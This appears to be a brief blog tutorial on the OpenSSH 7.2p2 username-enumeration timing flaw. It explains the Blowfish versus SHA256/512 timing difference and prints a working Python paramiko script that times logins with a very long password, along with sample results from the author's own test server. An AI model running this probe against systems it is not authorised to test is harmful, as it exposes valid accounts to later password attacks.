So when OpenSSH checks a user’s password, it will use a hashing function like SHA256 / SHA512 to hash the password and check it against the user’s saved hashed password.
However, OpenSSH 7.2p2 and before had a vulerability where it would use Blowfish for users that don’t exist, and SHA256 / SHA512 for real users. The two hashes compute data at different speeds, so it’s easy to tell a real one from a fake one. This bug shows some other info for it.
If SELinux is enabled, OpenSSH will use the helper binary “unix_chkpwd” which mitigates this flaw.
Here is a python script from this article. Setting the
<SET SERVER HERE> to whatever server we want to test, we can see if the server is vulerable:
import paramiko import time user=raw_input("user: ") p='A'*25000 ssh = paramiko.SSHClient() starttime=time.time() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect('<SET SERVER HERE>', username=user, password=p) except: endtime=time.time() total=endtime-starttime print(total)
So, first let’s test a remote server of mine that I setup just for this. I change the above ‘
Let’s test a real user (you can also user
root as the user, if it’s enabled):
user: realuser 12.5089271069
Then let’s test a fake one:
user: iambatman 2.69300603867
As you can see,
12.5 is greater than
2.6, so yes the server is vulerable.
In other cases, this can be done on a local system.
As you can see, the times are still different, but the real one is less than the fake one. I’m guessing this is due to SHA256/512 being faster than Blowfish, and the checker not adding any wait time as it’s a local connection.